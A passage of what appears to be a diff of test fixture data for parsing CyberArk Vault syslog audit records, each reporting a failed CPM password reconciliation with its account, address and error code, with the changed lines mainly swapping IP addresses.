System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615803137\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 07:49:11</Timestamp>\n    <IsoTimestamp>2021-03-14T14:49:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=3;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"3\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615733350\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:12:18</Timestamp>\n    <IsoTimestamp>2021-03-15T10:12:18Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=4;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615803137\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <7>1 2021-03-15T10:12:19Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:12:19</Timestamp>\n    <IsoTimestamp>2021-03-15T10:12:19Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n</Reason>\n    <ExtraDetails>address=34.123.103.115;retriescount=1;username=testark;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615803137\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:19","IsoTimestamp":"2021-03-15T10:12:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 05:57:13</Timestamp>\n    <IsoTimestamp>2021-03-15T12:57:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"5\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615813031\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 05:57:13</Timestamp>\n    <IsoTimestamp>2021-03-15T12:57:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"5\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615813031\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <7>1 2021-03-15T13:04:27Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:04:27</Timestamp>\n    <IsoTimestamp>2021-03-15T13:04:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n</Reason>\n    <ExtraDetails>address=34.123.103.115;username=testark;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615813465\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:04:27","IsoTimestamp":"2021-03-15T13:04:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <7>1 2021-03-15T14:44:37Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:44:37</Timestamp>\n    <IsoTimestamp>2021-03-15T14:44:37Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n</Reason>\n    <ExtraDetails>address=34.123.103.115;retriescount=1;username=testark;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615819476\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 